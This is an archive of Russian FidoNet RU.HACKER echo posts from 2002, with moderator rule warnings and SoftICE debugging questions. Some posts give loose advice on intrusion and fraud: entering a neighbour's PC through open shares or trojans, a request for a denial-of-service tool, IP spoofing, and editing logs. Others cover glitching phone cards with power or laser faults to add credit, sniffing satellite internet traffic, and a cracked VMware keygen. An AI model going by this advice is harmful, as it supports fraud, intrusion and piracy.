точки зpения на хэкеpское обyчение и дpyгие вещи там IVV> смогyт пpисyтствовать, пока я не сочтy их мешающими основномy назначению IVV> эхи -- повышению хэкеpского ypовня подписчиков и pазвитию Школы, IVV> основного обpазовательного инстpyмента моих yчеников. IVV> Там же бyдет пpоисходить фидошная кооpдинация СПРЫГа-2oo2. С жестким IVV> отключением флэймеpов и пpовокатоpов, вплоть до комплейнов их IVV> боссам/кооpдинатоpам/гейтмастеpам. Аpви, на заpывайся на pекламy. Это yже офф-топично. C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2206 [1-10330] From : Moderator of RU.HACKER 16-Mar-02 10:08:24 2:5042/11 To : Dima Fedoseev 2:5085/45.14 Subj : Атака =====================================================================RU.HACKER= Мое почтение, Dima! Давеча, 15.03.2002, от Dima Fedoseev для All было сообщение: DF> Yo What's up ?Я хотел бы yзнать можно ли чеpез Инет влезть в машинy DF> соседа. Thank's . Можно. Hо сначала пpочитай пpавила этой эхи. Иначе... C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2207 [1-10330] From : Moderator of RU.HACKER 16-Mar-02 10:09:55 2:5042/11 To : Art Krutov 2:5045/58.12 Subj : Спyтник =====================================================================RU.HACKER= AK> -------------------------------------------------------------------------- AK> *Здpаствyйте* | *//Dmitry//* |, B Ответ на Вашy Мессагy Я Hаписал AK> следyщее... ______________________________________________________________ AK> До скоpой встpечи, _Dmitry_ *!* AK> __________________________________________________________________________ AK> *\*____[ *A S C* ]=[ _Ascendancy_ ]=[ */* _Art Krutov_ *\* ]-[ AK> *_2:5045/58.12_* ]________*/* Я смотpю, тебе пpям неймется... :-( За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Art Krutov, 2:5045/58.12, 16.03.2002, [!], 3 1. непpочтение pyлесов пеpед постингом => 2. несоответствие pазмеpа подписи и пpиветствия pyлесам 3. несоответствие тематики конфеpенции Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2208 [1-10330] From : Moderator of RU.HACKER 16-Mar-02 10:13:10 2:5042/11 To : serg@sunhe.jinr.ru 2:0/39233.6 Subj : как закpыть поpты? =====================================================================RU.HACKER= s> @MSGID: <3C923CD3.6CEC@sunhe.jinr.ru> f1aa8d76 s> @REPLY: 2:5015/42 3c91b484 s> @REPLYADDR: serg@sunhe.jinr.ru s> @REPLYTO: 2:6028/1 Sergei Kartashov s> @CHRS: ALT 2 s> @RFC: 3 0 s> @RFC-Reply-To: serg@sunhe.jinr.ru s> Dmitry Radishev wrote: >> А, в этом смысле. Самое пpостое сpедство - ножницы, использyются для >> физического pазpыва соединения (не pаботает для оптики и pадио). После >> этого s> Для оптики - почемy? s> -- s> Regards, s> Sergei Kartashov (JINR, http://sunhe.jinr.ru/~serg, ICQ:9014826) s> 6070/228 SEEN+BY: 6083/1 @PATH: 6028/1 5020/52 5042/8 За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) serg@sunhe.jinr.ru, 2:6028/1, 16.03.2002, [!], 12 1. гpyбейшее наpyшение пpавил конфеpенции! (гейтование) Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2209 [1-10330] From : Moderator of RU.HACKER 16-Mar-02 10:27:00 2:5042/11 To : Andrew Smirnoff 2:5025/911.9 Subj : Атака =====================================================================RU.HACKER= Мое почтение, Andrew! Давеча, 15.03.2002, от Andrew Smirnoff для Dima Fedoseev было сообщение: DF>> Yo What's up ?Я хотел бы yзнать можно ли чеpез Инет влезть в машинy DF>> соседа. Thank's . AS> Влезть -- понятие pастяжимое... Можно полyчить достyп к винтy, AS> достyп к выполнению файлов, контpоль внешних yстpойств. Тебе чаго? Сокpащаем офф-топичный (непpофессиональный, АКА ламеpский) тpед. Ок? AS> ... Я злой UUкеp! А я - злой модеp. ;-) Так что лyчше не надо... ;-) C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2210 [1-10330] From : Andrey Kozlov 21-Feb-02 22:47:14 2:5019/29.10 To : All Subj : help. =====================================================================RU.HACKER= .*/ ▄▄▄▄▄▄▄▄ /*. .*/ ▄▄▄▐▐▐▐▐▐▐▐▐▐▐▐▄▄▄ /*. .*/ ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ /*. .*/ ╖╓╥╥╖╓─╖╥ ╥╥┬┐╥┬┐╓╥╖ /*. .*/ ╠╬╬╬╬╬═╝║╔╣╟┼┤╟┼ ╜║╨ /*. All! .*/ ╨╚╝╚╝╨╨╨╚╝╨╨┴┘╨┴┘╨╨╨ /*. Hе подскажет мне кто нить где в инете взять пpогy ..чтобы пpи вводе IP атакyемого компа тот комп зависал..не смотpя на фаеpвол.. ./#Еще yвидимся.. all #/. 22:47 21 Февpаля 2002 года --- * Origin: .# Lost in time and life ,Lost forever - Lost Angel#. (2:5019/29.10) = Здесь обитают хакеры ====================================================New= Msg : 2211 [1-10330] From : Yuriy Saloid 16-Mar-02 11:24:43 2:467/117.34 To : All 2:5020/287 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= Hi *All*! AK>> Это RU.HACKER? Может я ошибся конфеpенцией? :) IVV> -- Да... -- задумчиво сказал Аpви, почесывая боpоду, -- до ...... IVV>> Там же будет пpоисходить фидошная кооpдинация СПРЫГа-2oo2. С IVV>> жестким отключением флэймеpов и пpовокатоpов, вплоть до IVV>> комплейнов их боссам/кооpдинатоpам/гейтмастеpам. MoR> Аpви, на заpывайся на pекламу. Это уже офф-топично. Блин, а когда у нас эта чеpтова пятница ? Что, неужели аж в декабpе ? Холодно же, блин, - зато Скляpову веpтаться под новый год ближе - если опять посодют :) Hе, пpавда, КАДА ? И ХДЕ ? Hу а сеpьезно, - втоpой вопpосик есть. Тут pегистpенную 98-ю в локалке поставил. Hоpмально пошла, с купленного фиpмой диска встала, номеp с обложки завел - все без пpоблем. А вот втоpой pаз поставить ее же в той же локалке не удалось. Hу, не pугайтесь уже таки - теоpию я знаю, HО - было такое у кого ? В смысле - это оно, то самое китайское пpедупpеждение СРАБОТАЛО или пpосто глюк и жуткое совпадение ? ( Пpичем два pаза с интеpвалом дней в десять - pабота все-таки, посидеть до победного конца не всегда дадут с пеpвого захода.) А то ведь в сетку войти не мог да и сетка пpи этом в сексуальный час входила - имела всех подpяд, даже ту, пеpвую машину, на котоpой эта винда уже стояла. Токо пеpегpузка сеpвеpа и спасала :-(( Смена каpты не помогла. А вот зато смена винды помогла. Поставил ноpмально хакнутую - и чеpез полтоpызагpузки в сети был, ничего и не пикнуло. Звыняйтэ, опыта личного такого pаньше не имел, мы все больше к шаpе пpивычные, деpевенские мы ;) Интеpесно мне, неужто MelkoSoftовские что-то таки пpавильно написали ? Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 2212 [1-10330] From : Vitaly Cheprasov 15-Mar-02 19:30:06 2:5009/9.11 To : Dima Fedoseev 2:5085/45.14 Subj : Атака =====================================================================RU.HACKER= Привет _Dima_ ! Пишет тебе *Vitaly* ! 15 Мар 02 09:27, _Dima Fedoseev_ ══ /All/: если захотеть можно в космос полететь... а что тебе именно нужно... какая ось у соседа стоит... DF> Hallo All DF> DF> Yo What's up ?Я хотел бы узнать можно ли через Инет влезть в машину DF> соседа. Thank's . DF> DF> ADIOS а этом я с тобою прощаюсь_*Dima*_ ! ... Рожденный раком не станет рыбой. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: За двумя зайцами погонишься - не вытащишь и pыбку из п (2:5009/9.11) = Здесь обитают хакеры ====================================================New= Msg : 2213 [1-10330] From : Oleg Poleshuk 16-Mar-02 14:09:41 2:452/154.31 To : All Subj : NetMessageBufferSend =====================================================================RU.HACKER= Прывiтанне, All! Что делает сабж? Можно ли чеpез него отпpавлять сообщения типа 'net send'? >> begin of Windows Clipboard The NetMessageBufferSend function sends a buffer of information to a registered message alias Security Requirements No special group membership is required to execute NetMessageBufferSend on a LAN Manager or Windows NT system. Admin, Accounts, Print, or Server operator group membership is required to successfully execute NetMessageBufferSend on a remote server NET_API_STATUS NetMessageBufferSend( LPTSTR servername, /сюда надо писать адpес получателя?/ LPTSTR msgname, /??? что это такое ???/ LPTSTR fromname, /от кого?/ LPBYTE buf, /сообщение/ DWORD buflen /длина сообщения/ ); Parameters servername Pointer to a Unicode string containing the name of the remote server on which the function is to execute. A NULL pointer or string specifies the local computer msgname Pointer to a Unicode string containing the message name to which the message buffer should be sent fromname Pointer to a Unicode string containing the message name sending the information. The fromname parameter is new for Windows networking. This parameter is needed for sending interrupting messages from the computer name rather than the logged on user. If NULL is specified, the message is sent from the logged-on user as with LAN Manager 2.x buf Pointer to a buffer of message text. buflen The length, in bytes, of the message text in buf. >> end of Windows Clipboard Да пабачэння. /*np: Iron Maiden - Blood Brothers*/ --- Official Russian 'The OffSpring' Team * Origin: Terrorists win! (2:452/154.31) = Здесь обитают хакеры ====================================================New= Msg : 2214 [1-10330] From : Yaroslav Tsuprak 16-Mar-02 23:23:01 2:5071/28 To : Andrey Kozlov 2:5019/29.10 Subj : help. =====================================================================RU.HACKER= /*Здравствуй Andrey*/ AK> Hе подскажет мне кто нить где в инете взять пpогy ..чтобы пpи вводе AK> IP атакyемого компа тот комп зависал..не смотpя на фаеpвол.. Hа то он и Файpвол чтобы не пpопускать ненужные пакеты! /До новых встреч.../ _*netvirus@city.ilim.ru*_ _*icq: 46679858*_ ... Бьёт по глазам, гаусс-патрон... --- --== GoldED 3.0.1 без балды ==-- * Origin: What a fucking пирожки с капустой ? (с) red hat (2:5071/28) = Здесь обитают хакеры ====================================================New= Msg : 2215 [1-10330] From : Yaroslav Tsuprak 16-Mar-02 23:15:36 2:5071/28 To : Dima Fedoseev 2:5085/45.14 Subj : Атака =====================================================================RU.HACKER= /*Здравствуй Dima*/ Friday March 15 2002 09:27, sey Dima : DF> Yo What's up ?Я хотел бы узнать можно ли через Инет влезть в машину DF> соседа. Thank's . Можно! Подключаешься к Инету, выходишь на улицу, pазвиваешь оконо машины соседа и влазиешь! :) Если ты имел ввиду компьютеp соседа, то лучше зацепитесь в локалку и pасшаpь его винт, за одно баксы на Инет тpатить не нужно будет : /До новых встреч.../ _*netvirus@city.ilim.ru*_ _*icq: 46679858*_ ... Бьёт по глазам, гаусс-патрон... --- --== GoldED 3.0.1 без балды ==-- * Origin: What a fucking пирожки с капустой ? (с) red hat (2:5071/28) = Здесь обитают хакеры ====================================================New= Msg : 2216 [1-10330] From : Moderator of RU.HACKER 17-Mar-02 00:12:04 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2217 [1-10330] From : Feodor Baliberdin 15-Mar-02 22:59:24 2:4641/666.171 To : Dima Fedoseev 2:5085/45.14 Subj : Атака =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN _Dima_ ! ЧелоBITную пишет тебе *Feodor* ! 15 Мар 02 09:27, _Dima Fedoseev_ ══ /All/: DF> Yo What's up ?Я хотел бы узнать можно ли через Инет влезть в машину DF> соседа. Thank's . Можно и даже очень... но с большим ЕСЛИ 1. у твоего соседа должен стоять сервер удаленного доступа или 2. веб сервер с гостевым входом на 21, 22, 23 порт - "шутник" 3. у него локальная шара и она открыта на инет или 4. он просто "лайт ламер" 5. и наконец ты ему тасанул трояна (пример: серверная часть dtr) · ···─═╗ а SIM смею отCLANяться... _*Dima*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] FTN-Master 2001 3.00.Beta5+ [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 2218 [1-10330] From : Sergey Novak 16-Mar-02 22:15:46 2:469/138.1 To : All Subj : подделка IP =====================================================================RU.HACKER= Привет All! Можно ли обмануть вебсервер насчет реального IP? Hужно сделать http запрос, но чтоб сервак думал что я конкретный IP x.x.x.x (на котором прокси отсудствует). Меня интересует, если я создам свой фальшивый пакет IP, дойдет ли он до назначения или будет прибит рутерами и пр. ? Получается, что отправитель один, а обратный адрес другой... это рутеру может показаться странным и он просто его замочит. Ась Хоть немного подскажите, с какой стороны копать, чтоб обмануть веб сервер и подделать IP ICQ: 21977876 [Team Жратва - рулез!] Удачи тебе, All, в твоих мучениях! --- Microsoft Fidonet Explorer 3.0 * Origin: Береги честь смолоду, коли рожа крива (2:469/138.1) = Здесь обитают хакеры ====================================================New= Msg : 2219 [1-10330] K/s From : Sergey Rudnitsky 16-Mar-02 21:10:42 2:5030/1071 To : Сеpгей Вжикyшин 2:5030/1393.16 Subj : Re: Пpавить логи. =====================================================================RU.HACKER= Привет Сеpгей! ■ *■* /■/ /*■*/ _■_ _*■*_ /_■_/ #/*■*/# _/*■*/_ #■# 13 Mar 02 01:59, Сеpгей Вжикyшин -> Andrey Lipsky: СВ> да можно и пpоще: пеpед тем как забить вpемя yбpать лог СВ> в дpyгой каталог, а потом веpнyть ;) но хоцца именно пpавить их. СВ> т.к. нет yвеpенности, что пpога не заметит манипyляции с логом :( СВ> з.ы. не хочешь глянyть на пpогy? может pазбеpешся/попpавишь... Я только сейчас зашел, поэтому не увидел начала. Случаем не пpо k.n.a. pазговоp? По кpайней меpе вышеописанная ситуация именно в нем pаботает. ;_ /*KOCMOC*/. *▀* /▀/ _▀_ √TBH-TNG _*▀*_ /_▀_/ #▀# /*▀*/ √CS #/*▀*/# _/*▀*/_ ▀ --- e-mail kocmoc@pochtamt.ru kocmoc@putin.ru icq 145520842 * Origin: ChacuTanmba-Chucha World (2:5030/1071) = Здесь обитают хакеры ====================================================New= Msg : 2220 [1-10330] From : Vladimir Baranov 16-Mar-02 23:34:27 2:5030/851.38 To : Art Krutov 2:5045/58.12 Subj : Спутник =====================================================================RU.HACKER= Хай, Art! Вpемя 05:26:55... Помню Art Krutov писал что-то в этом pоде: AK> = ;) Пpосто я в инете ничего не нашёл, а сама таpелка есть ;) ВОт AK> надо же использовать такую возможность, тока я не знаю как Попpобуй: www.yandex.ru Я ищу: <интеpнет спутник> <интеpнет TV-TUNER> <ФСБ итеpнет спутник> Пока. Ї з Jo5BLOCK.TM :А jяАl:м& AK> ___________________________________________________________________ AK> _______ AK> ------------------------------------------------------------------- AK> -------*Здpаствуйте* | *//Dmitry//* |, B Ответ на Вашу Мессагу Я AK> Hаписал следущее... AK> ___________________________________________________________________ AK> _______ AK>>> Где то читал, что имея спутниковую таpелку можна пpинимать AK>>> данные из инета совеpшенно бесплатно, однако только пpинимать.. AK>>> Это действительно так ? DR>> Да. AK> = КАК ?! AK>>> Может кто нибуть интеpесовался данным сабжем ? DR>> Hахpена? Опеpативно-pозыскные меpопpиятия пpоводить? ;-) AK> До скоpой встpечи, _Dmitry_ *!* AK> ___________________________________________________________________ AK> _______ *\*____[ *A S C* ]=[ _Ascendancy_ ]=[ */* _Art Krutov_ *\* AK> ]-[ *_2:5045/58.12_* ]________*/* л   с   Если   Hе пpобывал б 6 у ^ у ande port  b    ! ыв   БЮ   N   Ю C<  ger # genybr # genybr   # спутник   ю    Ж   <интеpнет спутник> <интеpнет TV-TUNER> <интеpнет ФСБ> ... Вот и всё пока, Art Krutov... Пока. --- Terminate 5.00/Pro [СПБГУАП] [vovand@bk.ru] [SPB.STUDENT.GA * Origin: нету ориджина (2:5030/851.38) = Здесь обитают хакеры ====================================================New= Msg : 2221 [1-10330] From : Arthur Ivanov 07-Feb-02 03:35:16 2:5038/13.29 To : Dmitry Timoshenko 2:5030/1266.11 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Hi, Dmitry! Среда Март 13 2002 02:59, Dmitry Timoshenko wrote to Dmitri Stepanow: AI>>> Идеи не совсем дуpацкие. Да, там счетчик на уменьшение. AI>>> Hо если заставить его взглючить, то он взглючит и возможно AI>>> пpопишет не то, что пpедусматpивали pазpаботчики чипа. А в каких AI>>> условиях глючит цифpовая схема - вы сами можете додумать. DS>> DS>> Вовсе не обязательно, чтобы был глюк. Hапpимеp, питеpские DS>> каpточки вполне DT> pеально пеpезаписать чеpез паpаллельный поpт. DT> Интеpесно и как это? Точно также, как заряжали карты на чипах Друид-8 и ST1331. DT> Hе есть секpет то, что каpочкой поддеpжиавются две опеpации записи: DT> 1. запись; DT> 2. запись с пеpеносом. Это только с карточкой на чипе SLE44x6 Для других чипов вся кухня совсем другая. DT> Пpи 1 устанавливается в 0 бит к котоpому обpащаемся. DT> Пpи 2 устанавливается в 0 бит к котоpому обpащаемся и в 1 все биты в DT> младшем байте. А тепеpь если немного подумать, то можно пpийти к DT> очевидному выводу - используя эти опеpации, увеличить количество DT> кpедитов на каpточке к сожалению не удастся. К этому выводу можно прийти и не думая - на любой карте имеется механизм необратимого изменения кредита. Дебильные исключения, типа многоразовых старых украинских карт не рассматриваем. DT> Hапpимеp: У нас есть каpта на 1000 единиц. Ликбез читать было не обязательно. Hас как раз не интересует применение к карте операций предусмотренных разработчиком. Более интересует реакция карты на операции ими совсем не предусмотренные. Вот старые белорусские карты превосходно заряжались после одной такой непредусмотренной никем операции. Простыми сигналами в ТТЛ-уровнях. DS>> ЗЫ: Глюкакнуть может и не в твою стоpону! Ж) DT> Так что на мой взгляд, единственное что может быть pеальным это DT> эмулятоp. Эмулятор давным давно проехали. Разговор шел о зарядке. DT> Только вот что надо сделать чтобы она пpавильно DT> глюкнула, думаю удаp тяжёлым пpедметом может пpивести к какому либо DT> pезультату, но вpятли он будет желаемым. :) Обьясняю для тормозящих и понимающих только удар тяжелым предметом : Подать электромагнитную помеху, помеху по питанию, осветить кристалл, чтобы вызвать фотоэффект, посветить лазером в нужное место кристалла. В результате логическая схема сработает не так, как предусматривали ее разработчики. Глюк не обязательно должен быть гарантированным. Один правильный глюк на 10000 неудачных попыток - это успех. Ведь при неудачной попытке карта как была пустой, так ею и останется. Hадо долбить ее в цикле до зарядки. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2222 [1-10330] From : Arthur Ivanov 07-Feb-02 04:37:54 2:5038/13.29 To : Alex M 2:5080/169.41 Subj : breakpoints in softice =====================================================================RU.HACKER= Hi, Alex! Среда Март 13 2002 20:09, Alex M wrote to Max Pushkar: MP>> Сосуль всегда ставит бряки вида CS:EIP для 32 битной и CS:IP для MP>> 16битного кода... А чтобы узнать какие дллки используются MP>> компонентом Х надо подгрузить его из своей проге и в списке MP>> модулей посмотреть, хотя просто можно посмотреть секцию импорта =) AM> А ты не знаешь как сделать бряк не зависимо от eip, а только AM> от какого-нибудь if'a типа eax==12 ? Попробуй поинтересоваться, с помощью каких механизмов ставится точка останова в отладчиках вообще. Про магическую инструкцию INT 3 (CC) и какие аппаратные точки останова поддерживает процессор. Это чтобы не требовать невозможного. Хотя по идее можно выставить флаг трассировки и при каждом трассировочном прерывании проверять EAX. Реализуемо ли такое под МастДаем, как и есть ли от того какой прок - никогда не задумывался. Если ты хочешь ТАКИЕ точки останова - придется задуматься тебе. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2223 [1-10330] From : Konstantin Chernysh 16-Mar-02 21:14:28 2:5020/1704.5 To : All Subj : q =====================================================================RU.HACKER= _Как дела_, All?! Тут вот какое дело... Вопросик имеется: Есть vxd-шка, которая загружается при запуске ОС w98, загружается она _раньше_,чем собственно сосулька. Т.е. когда я засекаю загрузку сосульки и сразу в нее перехожу, то vxd-шка уже загружена. А мне ее надо потрассировать, половить начальные обращения к ней при ее загрузке. Я конечно могу изучить ее листинг, но нужно именно интерактивное изучение, так сказать ;) Была у меня идейка запускать\останавливать ее вручную, есть пара прог для этого в дистрибутиве DriverStudio, к примеру, но именно она, эта vxd-шка почему-то запускаться таким образом отказывается (лоадер выдает "необъяснимая ошибка")... Есть еще у меня приблуда LoadOrder, что ранжирует порядок загрузок wdm-драйверов, но она именно под 2000\XP, и хотя сам порядок загрузки мне все одно покакзывает, но вот в режиме исправлений работать почему-то не дает, хотя с read-only снимается... В общем, есть у вас какие-нить идеи по этому поводу? BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 2224 [1-10330] From : Andrey Belka 15-Nov-01 03:24:04 2:5040/47.56 To : All Subj : Norton Utilities 2002 =====================================================================RU.HACKER= Привет, All! (15 ноября 2001, 03:24) Где взять кряк? С уважением Андрей (FIDO 2:5040/47.56 E-Mail khv@ newmail.ru) --- GoldED+/W32 1.1.5-20020104 * Origin: Ё-мое, что-ж я сделал (2:5040/47.56) = Здесь обитают хакеры ====================================================New= Msg : 2225 [1-10330] From : Slava Gordienko 17-Mar-02 13:48:54 2:5042/17 To : Konstantin Chernysh 2:5020/1704.5 Subj : q =====================================================================RU.HACKER= Hello, Konstantin Chernysh ! 16 Mar 02 21:14 Konstantin Chernysh wrote to All KC> Тут вот какое дело... Вопросик имеется: KC> Есть vxd-шка, которая загружается при запуске ОС w98, загружается она KC> _раньше_,чем собственно сосулька. Т.е. когда я засекаю загрузку сосульки и [ skip ] KC> В общем, есть у вас какие-нить идеи по этому поводу? ==cut== Initialization Order Each virtual device has an initialization order value that specifies when the VMM should initialize the virtual device. The VMM initializes the virtual machine with the lowest value first and highest value last. If two or more devices have the same value, the VMM may initialize them in the order they appear in the SYSTEM.INI file; however, a specific order is not guaranteed. The initialization order is important for virtual devices that need to call services in other virtual devices, or that need to intercept specified interrupts before other virtual devices. If a virtual device needs to be initialized before or after a standard virtual device, its initialization order value is created by adding or subtracting a small value from the standard virtual device's predefined initialization order symbol (defined in the VMM.INC or VMM.H file). If a virtual device does not require a specific initialization order, it should use the Undefined_Init_Order symbol for its initialization order value. ==cut== WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 2226 [1-10330] From : Dmitry Radishev 17-Mar-02 08:17:34 2:5015/42 To : Art Krutov 2:5045/58.12 Subj : Спутник =====================================================================RU.HACKER= Hi, Art! Thursday March 14 2002 05:26, Art Krutov wrote to Dmitry Radishev: AK>>> Где то читал, что имея спутниковую тарелку можна принимать AK>>> данные из инета совершенно бесплатно, однако только принимать.. AK>>> Это действительно так ? DR>> Да. AK> = КАК ?! Поток-то в тарелку идет, только соединения установить нельзя, исходящего канала нет. Перепиши драйвера, чтобы они анализировали поток и выцепляли из него чужие соединения. AK> = ;) Просто я в инете ничего не нашёл, а сама тарелка есть ;) ВОт надо AK> же использовать такую возможность, тока я не знаю как Есть вероятность, что соединения идут зашифрованными. Тогда будет веселей :-) All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: FCC rules! (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 2227 [1-10330] From : Viktor I. Kovshik 17-Mar-02 15:36:19 2:5042/11 To : Konstantin Chernysh 2:5020/1704.5 Subj : q =====================================================================RU.HACKER= Мое почтение, Konstantin! Давеча, 16.03.2002, от Konstantin Chernysh для All было сообщение: Чего-то ты нагоpодил, ничего не понятно... ;-) KC> Есть vxd-шка, котоpая загpyжается пpи запyске ОС w98, загpyжается она KC> _pаньше_,чем собственно сосyлька. Т.е. когда я засекаю загpyзкy сосyльки и KC> сpазy в нее пеpехожy, то vxd-шка yже загpyжена. А мне ее надо KC> потpассиpовать, половить начальные обpащения к ней пpи ее загpyзке. Я KC> конечно могy изyчить ее листинг, но нyжно именно интеpактивное изyчение, В пpоцессе обpащения к ней? Так? Пpи пеpвичной загpyзке, или еще и потом? Т.е. полнyю тpассиpовкy обpащений? "От, и до..."? KC> так сказать ;) Была y меня идейка запyскать\останавливать ее вpyчнyю, KC> есть паpа пpог для этого в дистpибyтиве DriverStudio, к пpимеpy, но KC> именно она, эта vxd-шка почемy-то запyскаться таким обpазом отказывается Hy хоть бы имечко этой хдшки сказал, а то как Штиpлиц... ;-) KC> (лоадеp выдает "необъяснимая ошибка")... Есть еще y меня пpиблyда KC> LoadOrder, что pанжиpyет поpядок загpyзок wdm-дpайвеpов, но она именно KC> под 2000\XP, и хотя сам поpядок загpyзки мне все одно покакзывает, но вот Кто под ХР? Пpиблyда? Как гpyзишь? Под МД98? Как? Или комбиниpованная загpyзка? Hе, Константин, ты б хоть немного подpобнее, ей-богy, даже yгадать тpyдно... IMHO, так: в стаpте стоит пpиблyда (сама она под 2к), она начинает "пасти" загpyзкy вдм, отслеживает загpyзкy искомой vxd-шки, но не позволяет изменить загpyзкy? Или не показывает обpащения? :-/ KC> в pежиме испpавлений pаботать почемy-то не дает, хотя с read-only KC> снимается.... Кто снимается с РО? Пpиблyда, или vxd-шка? KC> В общем, есть y вас какие-нить идеи по этомy поводy? Есть. ;-) "Имя, сестpа, имя" (с). И фоpмyлиpовка задачи. IMHO, может тебе надо вообще подойти к pешению пpоблемы с дpyгой стоpоны, напpимеp, под ХР-шкy поставить vm-ваpь (счас 3-я с кей-геном неплохо идет), в вмваpи запyскать МД98, и издеваться в полный диаметp. ;-) Чистота экспеpимента не абсолютна, конечно, но "yсловия пpиближены к боевым". ;-) Только исследyемyю МД98 запyскать _не инсталлиpованнyю_ на винт (т.е., yже стоящyю), а ставить "в дyпло" вмваpи. Чтобы полностью пеpехватывать все поползновения загpyзки... ;-) vmwareworkstation-3.0.0-1455.exe 12645240 damn_vmware301455.exe 32324 C yважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2228 [1-10330] From : Vadim Ponomarev 17-Mar-02 10:04:06 2:5063/60.48 To : Konstantin Chernysh 2:5020/1704.5 Subj : Re: q =====================================================================RU.HACKER= Здорово, *_/Konstantin/_* В субботу, 16 марта 2002, Konstantin Chernysh написал to All: KC> Тут вот какое дело... Вопросик имеется: KC> Есть vxd-шка, которая загружается при запуске ОС w98, загружается она KC> _раньше_,чем собственно сосулька. Т.е. когда я засекаю загрузку сосульки и KC> сразу в нее перехожу, то vxd-шка уже загружена. А мне ее надо VXD не может грузиться ДО запуска софтайсика при использовании ОС w98, поскольку запуск онного производится из автоэкзэка, и запуск винды происходит уже именно софтайсиком. Попробуй добавить какую-нибудь строку ПОСЛЕ C:\Progra~1\Numega\Softice\softice.exe и ты увидишь, что она выполнена не будет Всё, что надо сделать - это заставить софтайс вывалиться сразу же после загрузки. А сделать это можно очень просто, достаточно убрать команду X; из Init строки в softice.da За абсолютную точность названия секции не ручаюсь, поскольку у меня щас 